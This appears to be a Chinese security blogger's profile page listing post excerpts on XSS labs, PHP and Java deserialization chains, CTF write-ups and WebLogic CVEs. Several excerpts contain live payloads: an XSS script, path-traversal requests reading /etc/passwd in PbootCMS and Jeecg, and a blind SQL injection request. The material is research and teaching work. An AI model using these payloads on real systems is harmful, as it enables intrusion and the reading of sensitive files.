3 灰色世界的阿信

尚未进行身份认证

时刻记住生活是灰色的,并努力接受它

等级
TA的排名 3k+

Google XSS Game通关笔记

Level 1: Hello, world of XSSpayload: <script>alert(1);</script>xss挖掘最重要的就是找到输入输出点,输入就是页面的那个搜索框(input标签),输出在b标签中:直接用最普通的payload测试,发现没有过滤。Level 2: Persistence is key输出还是在标签之间,不过这次是bloc...

2020-02-20 12:47:47

Thinkphp 6.0反序列化链再挖掘

文章首发于安全客:https://www.anquanke.com/post/id/194269

2020-02-17 11:28:24

以Commons-Collections为例谈Java反序列化POC的编写

文章首发于安全客:https://www.anquanke.com/post/id/195865

2020-02-17 11:26:59

谈谈log4j的反序列化

文章发布在安全客:https://www.anquanke.com/post/id/195932

2020-02-17 11:24:54

LFI in PbootCMS v2.x

GET /pbootcms/index.php?search=&searchtpl=/....//....//....//....//....//....//etc/passwd HTTP/1.1Host: localhostUser-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:70.0) Gecko/20100101 Firef...

2020-02-17 11:07:22

thinkcmf任意漏洞包含漏洞分析复现

简介ThinkCMF是一款基于PHP+MYSQL开发的中文内容管理框架,底层采用ThinkPHP3.2.3构建。ThinkCMF提出灵活的应用机制,框架自身提供基础的管理功能,而开发者可以根据自身的需求以应用的形式进行扩展。每个应用都能独立的完成自己的任务,也可通过系统调用其他应用进行协同工作。在这种运行机制下,开发商场应用的用户无需关心开发SNS应用时如何工作的,但他们之间又可通过系统本身...

2019-10-25 20:32:56

灰盒方式通关WebGoat 8

GET /WebGoat/SqlInjectionMitigations/servers?column=case%20when%20(select%20substr(ip,1,1)='0'%20from%20servers%20where%20hostname='webgoat-prd')%20then%20hostname%20else%20mac%20end HTTP/1.1Host:...

2020-02-17 10:59:16

Jeecg 任意文件下载漏洞

payload:localhost:8080/jeecg_war/chat/imController/showOrDownByurl.do?dbPath=../../etc/passwd&down=1它默认的文件路径是D://upFiles,我们部署在linux下把目录改为其他的任意目录,我这里修改为/tmp/uploads在配置文件中进行修改(/src/main/resource...

2020-02-17 10:58:22

jeesns漏洞挖掘

这是个java的cms,采用spring mvc+spring+mybatis架构,采用mybatis,看了几处,大概率是没有sql注入的了,然后想看看有没有越权之类的东西,但是他这里登录功能也做的很简单,直接就是用sessionid来判断的,所以没有越权然后是未授权访问,后台都是在/manage路由下的,然后这个路由下的所有controller都是加了@Before(AdminLoginInt...

2020-02-17 10:57:30

从红帽杯题目学习thinkphp 5.1反序列化利用链

前言作为一个Web菜鸡,我之前和师傅们参加了红帽杯,奈何只有0输出,当时只知道是thinkphp5.2的反序列化漏洞,但是感觉时间不够了,也就没有继续做下去。只有赛后来查漏补缺了,也借着tp5.2这个反序列化pop链来学习下大佬们的构造思路,不得不说这个pop链真的是很强了,在分析的过程中,妈妈一直问我为什么跪着玩电脑~红帽杯2019 Ticket_System思路在直接输入xml数据处存在...

2020-02-17 10:56:13

从安洵杯学习thinkphp 6.x反序列化POP链

前言刚刚过去的安洵杯,里面有一道iamthinking的题目(好像是这个名字吧),里面考察到了tp6的反序列化(通过访问www.zip可以下载源码),按照惯例,我还是没有做出来,我不知道咋绕过那个正则emmmm,给没有做题的大师傅献上关键源码吧,如果有师傅懂,欢迎评论<?phpnamespace app\controller;use app\BaseController;clas...

2020-02-17 10:54:43

2019总结&2020规划

2019总结去年做的比较好的一点就是一直在坚持做阶段性总结,这一个小习惯帮助我纠正了很多学习上的偏差,一直向着我想要达到的目的进发着。状态难以转换这是老毛病了,从一个状态过渡到另一个状态对我来说还是挺难受的,且容易受到环境影响,例如在寝室就会进入娱乐的状态,但是这个不一定是缺点,只要好好利用,依然可以发挥正向的作用,到一个好的环境就会有好的反馈。读的书转化率太低去年读的书的数量还...

2020-01-05 11:09:35

安恒杯2019.12月赛

BabySqli题目提示sqli。用户名处输入单引号报错,说明此处是注入点,用#号注释就不报错了,在测试sql语句的过程中发现进行了简单的拦截,但是可以用大小写绕过,然后利用union语句自己构造一行数据,在构造过程中知道name在第二个字段,猜测密码在第三个字段,且根据提示密码经过md5加密,所以,我们构造的密码也需要md5加密才行(小写,一开始我弄成了大写,死活不过)ping ping ...

2019-12-23 11:23:17

some vulnerabilities in qibosoft(齐博CMS整站系统v7)

ForewordThe csrf vulnerabilities exists almost everywhere in the application. Due to a number of background vulnerabilities, just with a few tricks, an attacker can take over the application. Next, ...

2019-10-23 11:25:10

xdebug的一些攻击面

前言偶然看到一篇关于利用xdeubg执行命令的文章,觉得挺有意思的,简单复现一下利用过程,做一个记录,原理性的东西就不多讲了原理简介xdebug是调试php代码的工具,遵循DBGp协议。其工作原理大概如下(搬运):IDE(如phpstorm)已经集成了一个遵循DBGp的Xdebug插件,当开启它的时候,会在本地开一个xdebug调试服务,监听在调试所设置的端口上,默认是9000,这个服...

2019-10-10 16:01:58

利用docker搭建php调试环境(phpstorm+xdebug)

前言最近审计php代码发现手动打印变量实在是太累了,不能快速的了解目标应用程序的运行逻辑。还是决定转战xdebug,下面是一些简单的记录…真香docker环境获取为什么用docker来搭建调试环境呢?一是本地搭建比较麻烦,二是没有docker便携,放在docker里,更加灵活。docker环境可以直接到dockerhub上去找一个,我用的下面这个https://hub.docker.com...

2019-10-09 18:11:29

weblogic T3协议(附python脚本)

前言前段时间总结了weblogic历年来的rce漏洞,并编写了poc,这些漏洞中有好几个都要用到T3协议来发送序列化数据,所以需要用python来模拟实现t3协议,当然t3协议脚本,github上就可以找到,虽然用别人的脚本改一下也可以完成数据的发送,但是我还是很好奇这个t3协议到底怎么构造的,怎么发送数据的,他的协议格式是什么样的,于是再一番查阅资料过后,有了这篇文章。这是正题废话不多说,...

2019-07-31 16:31:50

cve-2017-3506&cve-2017-10271

漏洞利用前提-影响版本10.3.6.0, 12.1.3.0, 12.2.1.0, 12.2.1.1 , 12.2.1.2原理简析漏洞触发位置:wls-wsat.war漏洞触发URL:/wls-wsat/CoordinatorPortType(POST)漏洞的本质:构造SOAP(XML)格式的请求,在解析的过程中导致XMLDecoder反序列化漏洞漏洞调用链:分析漏洞调用链web...

2019-05-27 14:10:16

cve-2018-2894

漏洞利用前提影响版本- 启用web服务测试页(某些版本需要开启,才能复现成功)漏洞利用方法复现环境: phith0n的dockerhttps://github.com/vulhub/vulhub/tree/master/weblogic/CVE-2018-2894由于使用的是别人的搭好的环境,所以我们需要知道weblogic后台的密码,使用如下命令查看:docker-compos...

2019-05-27 14:09:05

cve-2018-3191

漏洞利用前提影响版本WebLogic 10.3.6.0WebLogic 12.1.3.0WebLogic 12.2.1.2WebLogic 12.2.1.3配置开启T3协议(默认开启)原理简析漏洞利用方法生成payload针对不同的weblogic版本,需要使用不同的payload版本12.2.1.3使用下面的工具生成payloadhttps://github...

2019-05-27 14:07:58

查看更多

勋章 我的勋章
  • GitHub
    GitHub
    绑定GitHub第三方账户获取
  • 签到新秀
    签到新秀
    累计签到获取,不积跬步,无以至千里,继续坚持!
  • 专栏达人
    专栏达人
    授予成功创建个人博客专栏的用户。专栏中添加五篇以上博文即可点亮!撰写博客专栏浓缩技术精华,专栏达人就是你!
  • 持之以恒
    持之以恒
    授予每个自然月内发布4篇或4篇以上原创或翻译IT博文的用户。不积跬步无以至千里,不积小流无以成江海,程序人生的精彩需要坚持不懈地积累!
  • 勤写标兵Lv1
    勤写标兵Lv1
    授予每个自然周发布1篇到3篇原创IT博文的用户。本勋章将于次周周三上午根据用户上周的博文发布情况由系统自动颁发。